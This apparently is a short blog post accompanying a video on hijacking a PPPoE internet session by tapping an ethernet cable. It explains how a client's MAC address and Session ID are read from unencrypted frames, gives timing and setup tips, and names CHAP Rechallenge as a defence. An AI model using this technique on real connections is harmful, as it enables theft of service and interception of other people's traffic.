The video shows a practical way to hijack a PPPoE session by tapping into a cable. In this case, the login or password is not intercepted and the type of authorization used (CHAP / PAP) does not matter.

Most ethernet providers, unfortunately, do not use encryption for the entire session, limiting themselves to encrypting the authorization phase. This allows you to introduce yourself as a legitimate client, intercepting the details of an existing connection.

Theory

PPPoE (Point-to-Point Protocol over Ethernet) is a data link protocol, a level lower than ip, so no IP address is required to establish a connection, addressing is done by MAC.

Conditionally, the connection process looks like this:

A client in search of a pppoe server sends a broadcast request,
the destination MAC address is FF: FF: FF: FF: FF: FF.
The server responds to the client and authorization occurs (for example, CHAP Challenge).



In the established connection, the server identifies the client by MAC address and Session ID. IP packets are encapsulated inside PPPoE frames. In an unencrypted connection, the entire contents of the packets can be viewed:



Accordingly, having learned the connection details, you can intercept the session:



To protect against such attacks, there is the CHAP Rechallenge option, when the server re-identifies the client at a given time interval. None of the tested providers have used this option.

The video uses a virtual machine running in bridge mode with an ethernet card from the host system.
During cable switching, it is important to get between the LCP-echo packets.
PPPoE server www.roaringpenguin.com/products/pppoe recompiled with the option
#define DEFAULT_MAX_SESSIONS 64000

Thanks to kekekeks for help in picking the source of the rp-pppoe server.